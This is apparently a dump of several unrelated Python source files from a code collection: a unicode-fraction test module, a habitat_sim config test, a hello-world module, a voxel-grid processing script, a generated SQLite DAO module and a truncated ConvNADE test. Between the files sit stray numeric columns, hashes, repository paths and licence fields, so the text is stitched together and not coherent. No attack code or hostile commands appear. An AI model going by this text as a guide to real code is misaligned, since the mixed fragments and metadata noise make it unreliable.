"15⅙ km/h more") self.assertNotEqual(uni, txt) def test_922_norm_2_6(self) -> None: txt = "15 2/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅓ km/h more") self.assertNotEqual(uni, txt) def test_923_norm_3_6(self) -> None: txt = "15 3/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15½ km/h more") self.assertNotEqual(uni, txt) def test_924_norm_4_6(self) -> None: txt = "15 4/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅔ km/h more") self.assertNotEqual(uni, txt) def test_925_norm_5_6(self) -> None: txt = "15 5/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅚ km/h more") self.assertNotEqual(uni, txt) def test_930_norm_0_3(self) -> None: txt = "15 0/3 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15↉ km/h more") self.assertNotEqual(uni, txt) def test_931_norm_1_3(self) -> None: txt = "15 1/3 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅓ km/h more") self.assertNotEqual(uni, txt) def test_932_norm_2_3(self) -> None: txt = "15 2/3 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅔ km/h more") self.assertNotEqual(uni, txt) def test_941_norm_1_5(self) -> None: txt = "go 15 1/5 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "go 15⅕ km/h more") self.assertNotEqual(uni, txt) def test_942_norm_2_5(self) -> None: txt = "go 15 2/5 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "go 15⅖ km/h more") self.assertNotEqual(uni, txt) def test_943_norm_3_5(self) -> None: txt = "go 15 3/5 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "go 15⅗ km/h more") self.assertNotEqual(uni, txt) def test_944_norm_4_5(self) -> None: txt = "go 15 4/5 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "go 15⅘ km/h more") self.assertNotEqual(uni, txt) if __name__ == "__main__": from optparse import OptionParser _o = OptionParser("%prog [options] test*", epilog=__doc__.strip().split("\n")[0]) _o.add_option("-v", "--verbose", action="count", default=0, help="increase logging level [%default]") _o.add_option("--xmlresults", metavar="FILE", default=None, help="capture results as a junit xml file [%default]") _o.add_option("-l", "--logfile", metavar="FILE", default="", help="additionally save the output log to a file [%default]") opt, args = _o.parse_args() logging.basicConfig(level=logging.WARNING - opt.verbose * 5) # logfile = None if opt.logfile: if os.path.exists(opt.logfile): os.remove(opt.logfile) logfile = logging.FileHandler(opt.logfile) logfile.setFormatter(logging.Formatter("%(levelname)s:%(relativeCreated)d:%(message)s")) logging.getLogger().addHandler(logfile) logg.info("log diverted to %s", opt.logfile) xmlresults = None if opt.xmlresults: if os.path.exists(opt.xmlresults): os.remove(opt.xmlresults) xmlresults = open(opt.xmlresults, "w") logg.info("xml results into %s", opt.xmlresults) # unittest.main() suite = unittest.TestSuite() if not args: args = ["test_*"] for arg in args: for classname in sorted(globals()): if not classname.endswith("Test"): continue testclass = globals()[classname] for method in sorted(dir(testclass)): if "*" not in arg: arg += "*" if arg.startswith("_"): arg = arg[1:] if fnmatch(method, arg): suite.addTest(testclass(method)) # select runner if not logfile: if xmlresults: import xmlrunner # type: ignore Runner = xmlrunner.XMLTestRunner result = Runner(xmlresults).run(suite) else: Runner = unittest.TextTestRunner result = Runner(verbosity=opt.verbose).run(suite) else: Runner = unittest.TextTestRunner if xmlresults: import xmlrunner Runner = xmlrunner.XMLTestRunner result = Runner(logfile.stream, verbosity=opt.verbose).run(suite) # type: ignore if not result.wasSuccessful(): sys.exit(1)
51.5512
96
0.684322
7,505
64,439
5.751366
0.086076
0.125799
0.137198
0.12237
0.910504
0.89753
0.88736
0.849087
0.788342
0.724469
0
0.050005
0.194975
64,439
1,249
97
51.592474
0.769099
0.002048
0
0.443173
0
0
0.136055
0.080612
0
0
0
0
0.324612
1
0.271464
false
0
0.006541
0
0.278823
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
7
951dcab76b4e83c6f29102e6a688fe7d511a8ad3
318
py
Python
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
1
2021-04-27T01:33:38.000Z
2021-04-27T01:33:38.000Z
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
null
null
null
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
null
null
null
import habitat_sim def test_config_eq(): cfg1 = habitat_sim.Configuration( habitat_sim.SimulatorConfiguration(), [habitat_sim.AgentConfiguration()] ) cfg2 = habitat_sim.Configuration( habitat_sim.SimulatorConfiguration(), [habitat_sim.AgentConfiguration()] ) assert cfg1 == cfg2
24.461538
80
0.716981
30
318
7.3
0.433333
0.319635
0.210046
0.273973
0.757991
0.757991
0.757991
0.757991
0.757991
0
0
0.015444
0.185535
318
12
81
26.5
0.830116
0
0
0.222222
0
0
0
0
0
0
0
0
0.111111
1
0.111111
false
0
0.111111
0
0.222222
0
0
0
0
null
1
1
1
0
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1f1ada7c8ce8c23eeadc94368aba1d842ba91b9e
110
py
Python
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
5
2019-12-26T15:55:34.000Z
2021-08-03T03:33:47.000Z
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
15
2019-04-25T05:24:05.000Z
2021-03-19T01:57:12.000Z
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
1
2020-01-01T16:35:06.000Z
2020-01-01T16:35:06.000Z
"""Sub-module of the package.""" def hello_world(): """Print "Hello World".""" print("Hello World")
15.714286
32
0.590909
14
110
4.571429
0.642857
0.46875
0.46875
0.625
0.625
0
0
0
0
0
0
0
0.190909
110
6
33
18.333333
0.719101
0.427273
0
0
0
0
0.211538
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
8
1f57dbff931d4e33402d912aad8352c883efc7fc
8,396
py
Python
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
2
2015-09-18T00:17:16.000Z
2019-02-06T04:41:29.000Z
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
null
null
null
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
null
null
null
# Script to run find 2d corners on appearance grid # Author : Isabel Restrepo #8-31-2009 import bvpl_batch import time import os import sys #time.sleep(30); bvpl_batch.register_processes(); bvpl_batch.register_datatypes(); class dbvalue: def __init__(self, index, type): self.id = index # unsigned integer self.type = type # string find_corners = 1; load_corners = 0; pair_corners = 1; save_corners_vrml = 0; save_pairs_vrml = 0; save_centers_vrml = 0; corner_length = 3; corner_width = 3; corner_thickness =1; data_dir = sys.argv[1]; output_dir = sys.argv[2]; directions = sys.argv[3]; num_corners = int(sys.argv[4]); print("Data Dir"); print data_dir; print("Output Dir"); print output_dir; if not os.path.isdir( output_dir + "/"): os.mkdir( output_dir + "/"); if (find_corners): print("Load Voxel Grid"); bvpl_batch.init_process("bvxmLoadGridProcess"); bvpl_batch.set_input_string(0, data_dir +"/KL_gaussf1.vox"); bvpl_batch.set_input_string(1,"bsta_gauss_f1"); bvpl_batch.run_process(); (world_id,world_type)= bvpl_batch.commit_output(0); app_grid = dbvalue(world_id,world_type); print("Load Voxel Grid"); bvpl_batch.init_process("bvxmLoadGridProcess"); bvpl_batch.set_input_string(0, data_dir +"/ocp.vox"); bvpl_batch.set_input_string(1,"float"); bvpl_batch.run_process(); (world_id,world_type)= bvpl_batch.commit_output(0); ocp_grid = dbvalue(world_id,world_type); print("Creating corner 2d kernel"); bvpl_batch.init_process("bvplCreateCorner2dKernelVectorProcess"); bvpl_batch.set_input_unsigned(0, corner_length); #half length bvpl_batch.set_input_unsigned(1, corner_width); #half width bvpl_batch.set_input_unsigned(2, corner_thickness); #half thickness bvpl_batch.set_input_string(3, directions); bvpl_batch.run_process(); (kernel_id,kernel_type)= bvpl_batch.commit_output(0); corners_kernel_vector = dbvalue(kernel_id,kernel_type); print("Running Kernels"); bvpl_batch.init_process("bvplOperateOcpAndAppProcess"); bvpl_batch.set_input_from_db(0,ocp_grid ); bvpl_batch.set_input_from_db(1,app_grid ); bvpl_batch.set_input_from_db(2,corners_kernel_vector); bvpl_batch.set_input_string(3,"find_surface"); bvpl_batch.set_input_string(4,"positive_gauss_convolution"); bvpl_batch.set_input_string(5, output_dir + "/corners_resp.vox"); bvpl_batch.set_input_string(6, output_dir + "/corners_id.vox"); bvpl_batch.run_process(); (all_resp_grid_id,all_resp_grid_type)= bvpl_batch.commit_output(0); all_resp_grid = dbvalue(all_resp_grid_id,all_resp_grid_type); (all_id_grid_id,all_id_grid_type)= bvpl_batch.commit_output(1); all_id_grid = dbvalue(all_id_grid_id, all_id_grid_type); print("Getting top response"); bvpl_batch.init_process("bvplExtractTopResponseProcess"); bvpl_batch.set_input_from_db(0,all_resp_grid ); bvpl_batch.set_input_from_db(1,all_id_grid); bvpl_batch.set_input_unsigned(2,0); bvpl_batch.set_input_string(3, output_dir + "/corners_top_resp.vox"); bvpl_batch.set_input_string(4, output_dir + "/corners_top_id.vox"); bvpl_batch.run_process(); (response_grid_id,response_grid_type)= bvpl_batch.commit_output(0); response_grid = dbvalue(response_grid_id,response_grid_type); (id_grid_id,id_grid_type)= bvpl_batch.commit_output(1); id_grid = dbvalue(id_grid_id,id_grid_type); print("Writing Response Grid"); bvpl_batch.init_process("bvxmSaveGridRawProcess"); bvpl_batch.set_input_from_db(0,response_grid); bvpl_batch.set_input_string(1,output_dir + "/corners_top_resp.raw"); bvpl_batch.run_process(); if load_corners: print("Load Voxel Grid"); bvpl_batch.init_process("bvxmLoadGridProcess"); bvpl_batch.set_input_string(0,output_dir + "/corners_top_resp.vox"); bvpl_batch.set_input_string(1,"float"); bvpl_batch.run_process(); (response_grid_id,response_grid_type)= bvpl_batch.commit_output(0); response_grid = dbvalue(response_grid_id,response_grid_type); print("Load Voxel Grid"); bvpl_batch.init_process("bvxmLoadGridProcess"); bvpl_batch.set_input_string(0,output_dir + "/corners_top_id.vox" ); bvpl_batch.set_input_string(1,"int"); bvpl_batch.run_process(); (id_grid_id,id_grid_type)= bvpl_batch.commit_output(0); id_grid = dbvalue(id_grid_id,id_grid_type); print("Creating corner 2d kernel"); bvpl_batch.init_process("bvplCreateCorner2dKernelVectorProcess"); bvpl_batch.set_input_unsigned(0, corner_length); #half length bvpl_batch.set_input_unsigned(1, corner_width); #half width bvpl_batch.set_input_unsigned(2, corner_thickness); #half thickness bvpl_batch.set_input_string(3, directions); bvpl_batch.run_process(); (kernel_id,kernel_type)= bvpl_batch.commit_output(0); corners_kernel_vector = dbvalue(kernel_id,kernel_type); if pair_corners: print("Creating kernels to search for corners"); bvpl_batch.init_process("bvplCreateWCKernelVectorProcess"); bvpl_batch.set_input_int(0, -2); #min length bvpl_batch.set_input_int(1, 2); #max length bvpl_batch.set_input_int(2, 0 ); #min width bvpl_batch.set_input_int(3, 7); #max width bvpl_batch.set_input_int(4, -2); #min thickness bvpl_batch.set_input_int(5, 2); #max thickness bvpl_batch.set_input_string(6, directions); bvpl_batch.run_process(); (kernel_id,kernel_type)= bvpl_batch.commit_output(0); wc_kernel_vector = dbvalue(kernel_id,kernel_type); print("Searching for corners"); bvpl_batch.init_process("bvplFindCornerPairsProcess"); bvpl_batch.set_input_from_db(0,id_grid ); bvpl_batch.set_input_from_db(1,response_grid ); bvpl_batch.set_input_from_db(2,wc_kernel_vector); bvpl_batch.set_input_from_db(3,corners_kernel_vector); bvpl_batch.set_input_string(4,output_dir + "/pair_centers.vox"); bvpl_batch.run_process(); (pairs_id,pairs_type)= bvpl_batch.commit_output(0); pairs = dbvalue(pairs_id,pairs_type); (pairs_id,pairs_type)= bvpl_batch.commit_output(1); pairs_grid = dbvalue(pairs_id,pairs_type); if save_corners_vrml : print("Converting ID to Hue "); bvpl_batch.init_process("bvplConvertIdToHueProcess"); bvpl_batch.set_input_from_db(0,id_grid ); bvpl_batch.set_input_from_db(1,response_grid ); bvpl_batch.set_input_from_db(2,corners_kernel_vector); bvpl_batch.set_input_string(3, output_dir + "/hue_KL.vox"); bvpl_batch.set_input_string(4, output_dir + "/hue_KL.svg"); bvpl_batch.run_process(); (hue_grid_id,hue_grid_type)= bvpl_batch.commit_output(0); hue_grid = dbvalue(hue_grid_id,hue_grid_type); print("Writing Orientation Grid"); bvpl_batch.init_process("bvxmSaveRGBAGridVrmlProcess"); bvpl_batch.set_input_from_db(0,hue_grid); bvpl_batch.set_input_float(1,0.0); bvpl_batch.set_input_string(2,output_dir + "/all_lines.wrl"); bvpl_batch.run_process(); if save_centers_vrml : print("Converting ID to Hue "); bvpl_batch.init_process("bvplConvertPairToHueProcess"); bvpl_batch.set_input_from_db(0,pairs_grid ); bvpl_batch.set_input_from_db(1,corners_kernel_vector); bvpl_batch.set_input_string(2, output_dir + "/hue_centers_KL.vox"); bvpl_batch.set_input_string(3, output_dir + "/hue_KL.svg"); bvpl_batch.run_process(); (hue_grid_id,hue_grid_type)= bvpl_batch.commit_output(0); centers_hue_grid = dbvalue(hue_grid_id,hue_grid_type); print("Writing Orientation Grid"); bvpl_batch.init_process("bvxmSaveRGBAGridVrmlProcess"); bvpl_batch.set_input_from_db(0,centers_hue_grid); bvpl_batch.set_input_float(1,0.0); bvpl_batch.set_input_string(2,output_dir + "/all_lines.wrl"); bvpl_batch.run_process(); if save_pairs_vrml : hue = 0.0; print("Visualize pairs"); bvpl_batch.init_process("bvplVisualizeCornerPairsProcess"); bvpl_batch.set_input_from_db(0,pairs ); bvpl_batch.set_input_unsigned(1,0); bvpl_batch.set_input_string(2,output_dir + "/all_lines.wrl"); bvpl_batch.set_input_bool(3, 0); bvpl_batch.set_input_float(4, hue); bvpl_batch.run_process(); hue = hue + 1.0/float(num_corners); for i in range(1,num_corners,1): print(i); print("Visualize pairs"); bvpl_batch.init_process("bvplVisualizeCornerPairsProcess"); bvpl_batch.set_input_from_db(0,pairs ); bvpl_batch.set_input_unsigned(1,i); bvpl_batch.set_input_string(2,output_dir + "/all_lines.wrl"); bvpl_batch.set_input_bool(3, 0); bvpl_batch.set_input_float(4, hue); bvpl_batch.run_process(); hue = hue + 1.0/float(num_corners);
8,396
8,396
0.770367
1,309
8,396
4.517189
0.098549
0.181126
0.135972
0.192626
0.798072
0.762895
0.703704
0.666836
0.579232
0.572975
0
0.017724
0.106241
8,396
1
8,396
8,396
0.770256
0.997142
0
0.446809
0
0
0.143262
0.057403
0
0
0
0
0
0
null
null
0
0.021277
null
null
0.117021
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
2f52a5e1d7053dd36a51342dfbaa8f617fcedc72
95
py
Python
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
from magicdb.Models.MagicModel import MagicModel from magicdb.Models.DateModel import DateModel
47.5
48
0.884211
12
95
7
0.5
0.261905
0.404762
0
0
0
0
0
0
0
0
0
0.073684
95
2
49
47.5
0.954545
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
2f60d6dfbb692223d2063c92fd3325b4e590d5b9
13,912
py
Python
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
[ "MIT" ]
8
2018-03-10T05:33:58.000Z
2019-01-25T08:32:27.000Z
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
[ "MIT" ]
null
null
null
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
[ "MIT" ]
6
2018-10-15T17:07:28.000Z
2019-02-03T21:49:54.000Z
#!/usr/bin/env python3 ''' Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha) Generated @ Thu Jan 17 04:49:38 2019 ''' import sqlite3 class Employee: def __init__(self): self.db = './~CrudMeister.sqlt3' self.conn = None self.curs = None self.bOpen = False self.fields = [('Name', 'Text'), ('Email1', 'Text'), ('Email2', 'Text'), ('Email3', 'Text'), ('Phone1', 'Text'), ('Phone2', 'Text'), ('Phone3', 'Text'), ('Notes', 'Text')] self.table_name = 'Employee' def open(self): if self.bOpen is False: self.conn = sqlite3.connect(self.db) self.curs = self.conn.cursor() self.bOpen = True return True def close(self): if self.bOpen: self.conn.commit() self.bOpen = False return True def count(self): if self.bOpen: res = self.curs.execute("SELECT count(*) FROM Employee;") return res.fetchone()[0] return -1 def drop_table(self): if self.bOpen: self.curs.execute("DrOp TaBLe IF EXISTS Employee;") return True return False def create_table(self): if self.bOpen: self.curs.execute("CREATE TABLE IF NOT EXISTS Employee(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Email1 Text, Email2 Text, Email3 Text, Phone1 Text, Phone2 Text, Phone3 Text, Notes Text);") return True return False def insert(self, fields): if self.bOpen: self.curs.execute("INSERT INTO Employee ( Name, Email1, Email2, Email3, Phone1, Phone2, Phone3, Notes) VALUES (?,?,?,?,?,?,?,?);", fields) return True return False def delete(self, primary_key): if self.bOpen: self.curs.execute("DELETE from Employee WHERE ID = ?;", [primary_key]) return True return False def select(self, sql_select): if self.bOpen: self.curs.execute(sql_select) zlist = self.curs.fetchall() for ref in zlist: yield ref return None @staticmethod def Import(dao, encoding=None, text_file='Employee.csv', hasHeader=True, sep='|'): try: # dao.open() with open(text_file, encoding=encoding) as fh: line = fh.readline().strip() if hasHeader is True: line = fh.readline().strip() while len(line): if dao.insert(line.split(sep)) is False: return False line = fh.readline().strip() # dao.close() return True except: pass return False #!/usr/bin/env python3 ''' Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha) Generated @ Thu Jan 17 04:49:38 2019 ''' import sqlite3 class Principal: def __init__(self): self.db = './~CrudMeister.sqlt3' self.conn = None self.curs = None self.bOpen = False self.fields = [('Name', 'Text'), ('Email1', 'Text'), ('Email2', 'Text'), ('Email3', 'Text'), ('Phone1', 'Text'), ('Phone2', 'Text'), ('Phone3', 'Text'), ('Notes', 'Text')] self.table_name = 'Principal' def open(self): if self.bOpen is False: self.conn = sqlite3.connect(self.db) self.curs = self.conn.cursor() self.bOpen = True return True def close(self): if self.bOpen: self.conn.commit() self.bOpen = False return True def count(self): if self.bOpen: res = self.curs.execute("SELECT count(*) FROM Principal;") return res.fetchone()[0] return -1 def drop_table(self): if self.bOpen: self.curs.execute("DrOp TaBLe IF EXISTS Principal;") return True return False def create_table(self): if self.bOpen: self.curs.execute("CREATE TABLE IF NOT EXISTS Principal(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Email1 Text, Email2 Text, Email3 Text, Phone1 Text, Phone2 Text, Phone3 Text, Notes Text);") return True return False def insert(self, fields): if self.bOpen: self.curs.execute("INSERT INTO Principal ( Name, Email1, Email2, Email3, Phone1, Phone2, Phone3, Notes) VALUES (?,?,?,?,?,?,?,?);", fields) return True return False def delete(self, primary_key): if self.bOpen: self.curs.execute("DELETE from Principal WHERE ID = ?;", [primary_key]) return True return False def select(self, sql_select): if self.bOpen: self.curs.execute(sql_select) zlist = self.curs.fetchall() for ref in zlist: yield ref return None @staticmethod def Import(dao, encoding=None, text_file='Principal.csv', hasHeader=True, sep='|'): try: # dao.open() with open(text_file, encoding=encoding) as fh: line = fh.readline().strip() if hasHeader is True: line = fh.readline().strip() while len(line): if dao.insert(line.split(sep)) is False: return False line = fh.readline().strip() # dao.close() return True except: pass return False #!/usr/bin/env python3 ''' Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha) Generated @ Thu Jan 17 04:49:38 2019 ''' import sqlite3 class Event: def __init__(self): self.db = './~CrudMeister.sqlt3' self.conn = None self.curs = None self.bOpen = False self.fields = [('Name', 'Text'), ('Start', 'Text'), ('Stop', 'Text')] self.table_name = 'Event' def open(self): if self.bOpen is False: self.conn = sqlite3.connect(self.db) self.curs = self.conn.cursor() self.bOpen = True return True def close(self): if self.bOpen: self.conn.commit() self.bOpen = False return True def count(self): if self.bOpen: res = self.curs.execute("SELECT count(*) FROM Event;") return res.fetchone()[0] return -1 def drop_table(self): if self.bOpen: self.curs.execute("DrOp TaBLe IF EXISTS Event;") return True return False def create_table(self): if self.bOpen: self.curs.execute("CREATE TABLE IF NOT EXISTS Event(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Start Text, Stop Text);") return True return False def insert(self, fields): if self.bOpen: self.curs.execute("INSERT INTO Event ( Name, Start, Stop) VALUES (?,?,?);", fields) return True return False def delete(self, primary_key): if self.bOpen: self.curs.execute("DELETE from Event WHERE ID = ?;", [primary_key]) return True return False def select(self, sql_select): if self.bOpen: self.curs.execute(sql_select) zlist = self.curs.fetchall() for ref in zlist: yield ref return None @staticmethod def Import(dao, encoding=None, text_file='Event.csv', hasHeader=True, sep='|'): try: # dao.open() with open(text_file, encoding=encoding) as fh: line = fh.readline().strip() if hasHeader is True: line = fh.readline().strip() while len(line): if dao.insert(line.split(sep)) is False: return False line = fh.readline().strip() # dao.close() return True except: pass return False #!/usr/bin/env python3 ''' Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha) Generated @ Thu Jan 17 04:49:38 2019 ''' import sqlite3 class ToDo: def __init__(self): self.db = './~CrudMeister.sqlt3' self.conn = None self.curs = None self.bOpen = False self.fields = [('Name', 'Text'), ('Description', 'Text')] self.table_name = 'ToDo' def open(self): if self.bOpen is False: self.conn = sqlite3.connect(self.db) self.curs = self.conn.cursor() self.bOpen = True return True def close(self): if self.bOpen: self.conn.commit() self.bOpen = False return True def count(self): if self.bOpen: res = self.curs.execute("SELECT count(*) FROM ToDo;") return res.fetchone()[0] return -1 def drop_table(self): if self.bOpen: self.curs.execute("DrOp TaBLe IF EXISTS ToDo;") return True return False def create_table(self): if self.bOpen: self.curs.execute("CREATE TABLE IF NOT EXISTS ToDo(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Description Text);") return True return False def insert(self, fields): if self.bOpen: self.curs.execute("INSERT INTO ToDo ( Name, Description) VALUES (?,?);", fields) return True return False def delete(self, primary_key): if self.bOpen: self.curs.execute("DELETE from ToDo WHERE ID = ?;", [primary_key]) return True return False def select(self, sql_select): if self.bOpen: self.curs.execute(sql_select) zlist = self.curs.fetchall() for ref in zlist: yield ref return None @staticmethod def Import(dao, encoding=None, text_file='ToDo.csv', hasHeader=True, sep='|'): try: # dao.open() with open(text_file, encoding=encoding) as fh: line = fh.readline().strip() if hasHeader is True: line = fh.readline().strip() while len(line): if dao.insert(line.split(sep)) is False: return False line = fh.readline().strip() # dao.close() return True except: pass return False #!/usr/bin/env python3 ''' Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha) Generated @ Thu Jan 17 04:49:38 2019 ''' import sqlite3 class Entry: def __init__(self): self.db = './~CrudMeister.sqlt3' self.conn = None self.curs = None self.bOpen = False self.fields = [('DateTime', 'Text'), ('ObjectName', 'Text'), ('ObjectId', 'Integer'), ('Description', 'Text')] self.table_name = 'Entry' def open(self): if self.bOpen is False: self.conn = sqlite3.connect(self.db) self.curs = self.conn.cursor() self.bOpen = True return True def close(self): if self.bOpen: self.conn.commit() self.bOpen = False return True def count(self): if self.bOpen: res = self.curs.execute("SELECT count(*) FROM Entry;") return res.fetchone()[0] return -1 def drop_table(self): if self.bOpen: self.curs.execute("DrOp TaBLe IF EXISTS Entry;") return True return False def create_table(self): if self.bOpen: self.curs.execute("CREATE TABLE IF NOT EXISTS Entry(ID INTEGER PRIMARY KEY AUTOINCREMENT, DateTime Text, ObjectName Text, ObjectId Integer, Description Text);") return True return False def insert(self, fields): if self.bOpen: self.curs.execute("INSERT INTO Entry ( DateTime, ObjectName, ObjectId, Description) VALUES (?,?,?,?);", fields) return True return False def delete(self, primary_key): if self.bOpen: self.curs.execute("DELETE from Entry WHERE ID = ?;", [primary_key]) return True return False def select(self, sql_select): if self.bOpen: self.curs.execute(sql_select) zlist = self.curs.fetchall() for ref in zlist: yield ref return None @staticmethod def Import(dao, encoding=None, text_file='Entry.csv', hasHeader=True, sep='|'): try: # dao.open() with open(text_file, encoding=encoding) as fh: line = fh.readline().strip() if hasHeader is True: line = fh.readline().strip() while len(line): if dao.insert(line.split(sep)) is False: return False line = fh.readline().strip() # dao.close() return True except: pass return False
30.98441
210
0.502372
1,500
13,912
4.616
0.073333
0.07149
0.063547
0.064991
0.956095
0.945552
0.941219
0.929665
0.915656
0.915656
0
0.018398
0.390526
13,912
448
211
31.053571
0.798207
0.02178
0
0.871642
1
0.01791
0.155568
0
0
0
0
0
0
1
0.149254
false
0.014925
0.029851
0
0.432836
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
2f8688f3a968d5645cc87722a2e3f0ae5ba5c4a4
119
py
Python
snake_rl/algorithms/common/__init__.py
alex-petrenko/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
1
2021-08-28T10:37:33.000Z
2021-08-28T10:37:33.000Z
snake_rl/algorithms/common/__init__.py
dre2004/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
null
null
null
snake_rl/algorithms/common/__init__.py
dre2004/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
1
2021-02-18T00:22:40.000Z
2021-02-18T00:22:40.000Z
from snake_rl.algorithms.common.agent import AgentLearner from snake_rl.algorithms.common.loops import run_policy_loop
39.666667
60
0.882353
18
119
5.611111
0.666667
0.178218
0.217822
0.415842
0.534653
0
0
0
0
0
0
0
0.067227
119
2
61
59.5
0.90991
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
2f9a7447e86252897b9bc7d64d40b608f792a308
30,187
py
Python
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
43
2017-06-19T21:19:55.000Z
2022-02-06T01:21:48.000Z
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
1
2017-08-29T14:09:49.000Z
2017-09-08T12:34:19.000Z
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
12
2017-09-12T07:56:13.000Z
2021-09-19T19:11:41.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import sys # Hack so you don't have to put the library containing this script in the PYTHONPATH. sys.path = [os.path.abspath(os.path.join(__file__, '..', '..'))] + sys.path import theano import theano.tensor as T import numpy as np import tempfile from numpy.testing import assert_equal, assert_almost_equal, assert_array_equal, assert_array_almost_equal import smartlearner.initializers as initer from smartlearner import Trainer, Dataset, Model from smartlearner import tasks from smartlearner import views from smartlearner import stopping_criteria import smartlearner.initializers as initer from smartlearner.utils import sharedX from smartlearner.optimizers import SGD from smartlearner.direction_modifiers import ConstantLearningRate #from smartlearner.batch_schedulers import MiniBatchScheduler, FullBatchScheduler #from smartlearner.losses.classification_losses import NegativeLogLikelihood as NLL #from smartlearner.losses.classification_losses import ClassificationError from convnade.utils import Timer, cartesian from convnade.datasets import load_binarized_mnist from convnade import DeepConvNADE, DeepConvNADEBuilder from convnade import generate_blueprints #from convnade.tasks import DeepNadeOrderingTask from convnade.batch_schedulers import MiniBatchSchedulerWithAutoregressiveMask from convnade.losses import BinaryCrossEntropyEstimateWithAutoRegressiveMask np.set_printoptions(linewidth=220) def test_simple_convnade(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "sigmoid" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 3 nb_orderings = 1 print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(max_epoch)) with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 